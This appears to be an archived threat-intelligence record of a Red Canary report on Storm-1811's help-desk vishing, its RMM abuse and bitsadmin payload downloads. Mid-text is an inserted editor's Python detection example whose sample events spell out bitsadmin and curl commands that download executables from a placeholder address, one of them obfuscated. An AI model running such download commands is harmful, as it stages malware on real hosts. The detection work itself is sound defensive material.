{
	"id": "250f3cf9-9aa8-4bb1-a028-e006366328c9",
	"created_at": "2026-04-06T00:07:50.738267Z",
	"updated_at": "2026-04-10T13:11:44.900956Z",
	"deleted_at": null,
	"sha1_hash": "2cf407d7bd64eaa759898223b02db30245d75b48",
	"title": "Intelligence Insights: June 2024",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74198,
	"plain_text": "Intelligence Insights: June 2024\r\nBy susannah.matt@redcanary.com\r\nArchived: 2026-04-05 13:08:12 UTC\r\n⬆ = trending up from previous month\r\n⬇ = trending down from previous month\r\n➡ = no change in rank from previous month\r\n*Denotes a tie\r\nTracking Storm-1811’s help desk scams\r\nOur newcomer to the list this month is Storm-1811. Beginning in late April 2024 and continuing throughout May, Red Canary saw an activity cluster that we are tracking as Storm-1811. This is Microsoft’s name for a financially motivated threat actor that uses social engineering to gain initial access to environments via remote monitoring and management (RMM) tools—including Microsoft Quick Assist—on victim endpoints.\r\nStorm-1811 combines different communication methods in ways that increase the effectiveness of their social engineering scams. They use voice phishing (aka vishing), calling users while masquerading as tech support, sometimes after reportedly flooding the users’ inboxes with emails. According to Microsoft, in recent attacks they have also used Microsoft Teams messages to bolster their credibility as IT staff. The adversary convinces victims to provide remote access through Microsoft Quick Assist or by downloading and running AnyDesk.\r\nAfter the adversary gains access, we observed Storm-1811 using curl to download additional tools like OpenSSH, ScreenConnect, and NetSupport Manager. Other reported payloads include Impacket, used for lateral movement, and PsExec, used to deploy Black Basta ransomware.\r\nSocial engineering attacks are, admittedly, hard to combat. Some mitigation strategies to consider are:\r\nTraining users to verify the identity of IT staff who call them via trusted internal methods, for example confirming identities over a video call or requiring a shared secret such as the serial number of the endpoint in question.\r\nQuick Assist is installed by default on Windows machines.
If it is not in use in your environment, disable or uninstall it.\r\nInventory the RMM tools that are approved for use in your environment. Investigate security alerts for unapproved RMM tools, and also suspicious activity involving approved ones. If possible, block RMM tools commonly used in malicious attacks—for example, NetSupport, AnyDesk, and ScreenConnect—that aren’t in use in your environment.\r\nRed Canary also saw Storm-1811 use bitsadmin.exe to download follow-on payloads. This gives us a detection opportunity.\r\nhttps://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/\r\nPage 1 of 2\r\nDetection opportunity: Executing the Background Intelligent Transfer Service (bitsadmin.exe) to download files\r\nThis pseudo detection analytic identifies execution of the Background Intelligent Transfer Service (bitsadmin.exe) with command options that signal file downloads. Adversaries like Storm-1811 use bitsadmin.exe to download malware because it is a Microsoft-signed binary that already lives on every Windows host, so it passes application allowlisting (whitelisting) controls that would block an unknown downloader. Note that bitsadmin.exe may be used legitimately by some administration software in your environment.\r\nprocess == ( bitsadmin )\r\n\u0026\u0026\r\ncommand_line_includes == ( download )\r\n\u0026\u0026\r\ndeobfuscated_command_line_includes == ( bitsadmin , download )\r\n\u0026\u0026\r\ncommand_line_does_not_include == ( * )\r\nNote: * is a placeholder for strings associated with legitimate use of bitsadmin in your environment.\r\nIn case you missed it: Open your scripts with Notepad\r\nMany malware families use scripts as part of their intrusions. Scripts have been popular with adversaries for years, a trend that shows no sign of slowing down.
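The bitsadmin pseudo analytic from the detection opportunity above, turned into runnable Python so it can be exercised against sample telemetry before it goes into a detection engine. This is an added example written for this page, not Red Canary's code. It assumes each event is a dict with a process image path and a command line; the six sample events, the address 203.0.113.10 (a documentation range) and the two legitimate-use placeholder strings are all constructed. The deobfuscation step undoes the quote splitting and caret escapes that make the raw command line fail a plain substring match, and the last rule deliberately goes beyond the page's analytic by also flagging /transfer and /addfile jobs, which download without the word download ever appearing.

```python
# Added example (editor's code, not Red Canary's): the bitsadmin download
# analytic from the detection opportunity above, run over constructed events.
# Assumed event shape: {'process': <image path>, 'command_line': <string>}.

# Constructed placeholder for the analytic's * clause: strings that mark
# legitimate bitsadmin use in your environment. Both values are hypothetical.
LEGITIMATE_USE_STRINGS = (
    'updates.example-corp.internal',   # hypothetical internal update server
    '/transfer inventoryagent ',       # hypothetical approved agent job name
)

DQUOTE = chr(34)     # double-quote character, built with chr() to keep sample strings simple
BACKSLASH = chr(92)  # backslash; real Windows telemetry paths use it


def process_name(image_path):
    # Normalise separators, keep the basename, drop a trailing .exe.
    base = image_path.replace(BACKSLASH, '/').rsplit('/', 1)[-1]
    return base.lower().removesuffix('.exe')


def deobfuscate(command_line):
    # Undo two cmd.exe tricks that defeat naive substring matching:
    #   quotes inserted inside a token (bits + quote + adm + quote + in still
    #   launches bitsadmin, and the child keeps the quotes in its command line)
    #   caret escapes, which show up in the parent cmd.exe command line.
    # Then lowercase and collapse whitespace.
    s = command_line.replace('^', '').replace(DQUOTE, '')
    return ' '.join(s.split()).lower()


def evaluate(event):
    # Return the reason an event matches, or None. Mirrors the pseudo analytic:
    # process == bitsadmin, deobfuscated command line includes both bitsadmin
    # and download, and no legitimate-use string is present. The raw
    # command_line_includes(download) clause is folded into the deobfuscated
    # check, which is strictly broader.
    if process_name(event['process']) != 'bitsadmin':
        return None
    cmd = deobfuscate(event['command_line'])
    if 'bitsadmin' not in cmd:
        return None
    if any(marker.lower() in cmd for marker in LEGITIMATE_USE_STRINGS):
        return None
    if 'download' in cmd:
        return 'bitsadmin download keyword'
    # Beyond the page's analytic: /transfer creates a download job by default,
    # and /addfile (completed later by /resume) downloads without the keyword.
    if '/transfer' in cmd or '/addfile' in cmd:
        return 'bitsadmin transfer without download keyword'
    return None


# Constructed sample events. Paths use forward slashes only to keep the
# sample readable; process_name() accepts backslashes as well.
SAMPLE_EVENTS = [
    # 0: textbook malicious download, the Storm-1811 pattern
    {'process': 'C:/Windows/System32/bitsadmin.exe',
     'command_line': 'bitsadmin /transfer job1 /download /priority high http://203.0.113.10/ss.exe C:/Users/Public/ss.exe'},
    # 1: same job with quotes splitting the tokens bitsadmin and download
    {'process': 'C:/Windows/System32/bitsadmin.exe',
     'command_line': 'bits%sadm%sin /transfer job2 /%sdown%sload /priority high http://203.0.113.10/ss.exe C:/Users/Public/ss.exe' % ((DQUOTE,) * 4)},
    # 2: approved agent, excluded by the placeholder list
    {'process': 'C:/Windows/System32/bitsadmin.exe',
     'command_line': 'bitsadmin /transfer InventoryAgent /download /priority low https://updates.example-corp.internal/agent.msi C:/ProgramData/agent.msi'},
    # 3: /transfer with no /download keyword still downloads
    {'process': 'C:/Windows/System32/bitsadmin.exe',
     'command_line': 'bitsadmin /transfer j3 http://203.0.113.10/b.dll C:/ProgramData/b.dll'},
    # 4: a different downloader, out of scope for this analytic
    {'process': 'C:/Windows/System32/curl.exe',
     'command_line': 'curl -o C:/Users/Public/x.exe http://203.0.113.10/x.exe'},
    # 5: bitsadmin listing jobs, not downloading
    {'process': 'C:/Windows/System32/bitsadmin.exe',
     'command_line': 'bitsadmin /list /allusers'},
]


def run(events=SAMPLE_EVENTS):
    # Return [(index, reason)] for every event that fires.
    hits = []
    for i, ev in enumerate(events):
        reason = evaluate(ev)
        if reason:
            hits.append((i, reason))
    return hits


if __name__ == '__main__':
    for i, reason in run():
        print(i, reason, SAMPLE_EVENTS[i]['command_line'])
```

Run as a script it prints the matching events (0, 1 and 3). In a real pipeline evaluate() would be applied to each process-creation event from EDR or Sysmon Event ID 1, with LEGITIMATE_USE_STRINGS populated from the tuning the page's note asks for. Tune that list narrowly rather than excluding a whole hostname or job name: a blanket exclusion on your software distribution server also hides an adversary who stages payloads on that server after compromising it.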
These lures come in multiple script types, including JavaScript, and are delivered in multiple ways.\r\nIf a trusting user opens such a script, it normally executes immediately. One way to mitigate this is to create a Group Policy Object (GPO) that changes the default handler for commonly misused script extensions so they behave like benign text files: they open in Notepad rather than executing. On May 31, Jeff Felling and Red Canary published a blog post about recent prevalent threats like SocGholish and Gootloader that are delivered as script lures, and shared specific details on how to create these GPOs to help protect your environment.\r\nSource: https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2024/"
	],
	"report_names": [
		"intelligence-insights-june-2024"
	],
	"threat_actors": [
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bc98fce-5e1c-46d8-9d1a-64b5cb5febc3",
			"created_at": "2025-04-23T02:00:55.20526Z",
			"updated_at": "2026-04-10T02:00:05.307504Z",
			"deleted_at": null,
			"main_name": "Storm-1811",
			"aliases": [
				"Storm-1811"
			],
			"source_name": "MITRE:Storm-1811",
			"tools": [
				"Black Basta",
				"Cobalt Strike",
				"Quick Assist",
				"BITSAdmin",
				"PsExec",
				"Impacket",
				"QakBot"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434070,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2cf407d7bd64eaa759898223b02db30245d75b48.pdf",
		"text": "https://archive.orkl.eu/2cf407d7bd64eaa759898223b02db30245d75b48.txt",
		"img": "https://archive.orkl.eu/2cf407d7bd64eaa759898223b02db30245d75b48.jpg"
	}
}